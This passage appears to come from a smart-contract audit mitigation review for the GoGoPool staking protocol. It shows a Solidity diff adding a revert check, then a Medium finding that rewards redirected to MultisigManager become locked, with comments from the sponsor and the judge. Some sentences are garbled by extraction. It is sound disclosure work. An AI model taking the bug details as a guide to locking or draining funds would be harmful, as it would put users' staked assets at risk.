+ error UnableToProcess(); function processMinipoolEndWithRewards(address nodeID) public returns (MinipoolManager.Minipool memory) { + if (ggAVAX.amountAvailableForStaking() == 0) revert UnableToProcess(); MinipoolManager.Minipool memory mp = minipoolMgr.getMinipoolByNodeID(nodeID); uint256 totalAvax = mp.avaxNodeOpAmt + mp.avaxLiquidStakerAmt; // Rialto queries Avalanche node to verify that validation period was successful uint256 rewards = minipoolMgr.getExpectedAVAXRewardsAmt(mp.duration, totalAvax); // Send the funds plus rewards back to MinipoolManager minipoolMgr.recordStakingEndThenMaybeCycle{value: totalAvax + rewards}(mp.nodeID, block.timestamp, rewards); mp = minipoolMgr.getMinipoolByNodeID(mp.nodeID); return mp; } function processMinipoolEndWithoutRewards(address nodeID) public returns (MinipoolManager.Minipool memory) { + if (ggAVAX.amountAvailableForStaking() == 0) revert UnableToProcess(); MinipoolManager.Minipool memory mp = minipoolMgr.getMinipoolByNodeID(nodeID); uint256 totalAvax = mp.avaxNodeOpAmt + mp.avaxLiquidStakerAmt; uint256 rewards = 0; // Send the funds plus NO rewards back to MinipoolManager minipoolMgr.recordStakingEndThenMaybeCycle{value: totalAvax + rewards}(mp.nodeID, block.timestamp, rewards); mp = minipoolMgr.getMinipoolByNodeID(mp.nodeID); return mp; }
The added check ensures the atomic transaction is going to reliably recreate amidst the right pick for the validating amount I recommended earlier in this issue.
Otherwise, opting for a resolution by using
is going to be tricky due to the restrictingrequireValidStateTransition()
[MR:M-04] There is no way to retrieve the rewards from the MultisigManager and rewards are locked in the vault
Submitted by hansfriese, also found by ladboy233
Original Issue
M-21: Division by zero error can block RewardsPool#startRewardCycle if all multisig wallet are disabled
The protocol provides an external function startRewardsCycle()
so that anyone can start a new reward cycle if necessary.
Before mitigation, there was an edge case where this function will revert due to division by zero.
Edge case: there are no multisigs enabled. (possible when Ocyticus.disableAllMultisigs(), Ocyticus.pauseEverything()
is called)
PR #37
If no multisig is enabled, the mitigation sends the rewards to the MultisigManager
and it makes sense.
But this created another issue. There is no way to retrieve the rewards back from the MultisigManager
New issue
There is no way to retrieve the rewards from the MultisigManager
and rewards are locked in the vault.
Code snippet
There is no way to retrieve the rewards from the MultisigManager
and rewards are locked in the vault.
Proof of Concept
The rewards that were accrued in this specific edge case are locked in the MultisigManager
It is understood that the funds are not lost and the protocol can be upgraded with a new MultisigManager
contract with a proper function.
I evaluate the severity of the new issue as Medium because funds are locked in some specific edge cases and only withdrawable after contract upgrades.
Recommended additional mitigation
Add a new external function in the MultisigManager
with guardianOrSpecificRegisteredContract("Ocyticus", msg.sender)
modifier and distribute the pending rewards to the active multisigs.
Mitigation error - created another issue for the same edge case.
0xju1ie (GoGoPool) confirmed and commented:
I think this is valid. We do plan on adding a claim or withdrawal method that allows an enabled multisig to receive those funds. This can also be easily added with an upgrade once the issue occurs if we arent able to add it to this version.
Alex the Entreprenerd (judge) commented:
Seems like
doesn’t offer a sweep function, which would cause tokens to be stuck.Due to the conditionality, I agree with Medium Severity.
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